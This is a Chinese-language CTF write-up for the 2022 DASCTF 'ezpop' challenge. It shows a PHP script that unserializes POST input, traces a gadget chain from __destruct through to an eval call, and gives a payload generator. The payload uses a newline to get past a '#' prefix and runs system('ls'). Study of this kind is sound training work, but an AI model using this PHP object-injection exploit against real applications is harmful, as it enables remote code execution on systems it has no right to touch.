[2022DASCTF]ezpop
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
public $a;
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class mix
{
public $m1;
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
highlight_file(__FILE__);
}
?>
__destruct入口
public function __destruct()
{
echo $this->f1 . '114514';
}
$a=new fin() (入口该位置有字符拼接,正好what处有tostring) -->f1=new what()
public function __toString()
{
$this->a->run();
return 'hello';
}
$b=new what(); -->a =new mix()(mix处和fin处同时有run mix处没跳过所以走一下吧)
public $m1;
public function run()
{
($this->m1)();
}
$c=new mix(); -->m1=new crow();
public function __invoke()
{
$this->v1->world();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
crow的invoke跳到fin 的call
$a2=new fin();
public function get_flag()
{
eval('#' . $this->m1);
}
call 跳到mix的getflag
最后
<?php
class crow
{
public $v1;
public $v2;
}
class fin
{
public $f1;
}
class what
{
public $a;
}
class mix
{
public $m1;
}
$a=new fin();
$b=new what();
$c=new mix();
$d=new crow();
$a2=new fin();
$c2=new mix();
$a->f1=$b;
$b->a=$c;
$c->m1=$d;
$d->v1=$a2;
$a2->f1=$c2;
$c2->m1="
system(\"ls\");"; ///cat *查看
echo urlencode(serialize($a))
?>
这个位置是加换行绕过#
$c2->m1="system(\"ls\");";
$c2->m1="
system(\"ls\");";
解:
绕过eval前面的#加回车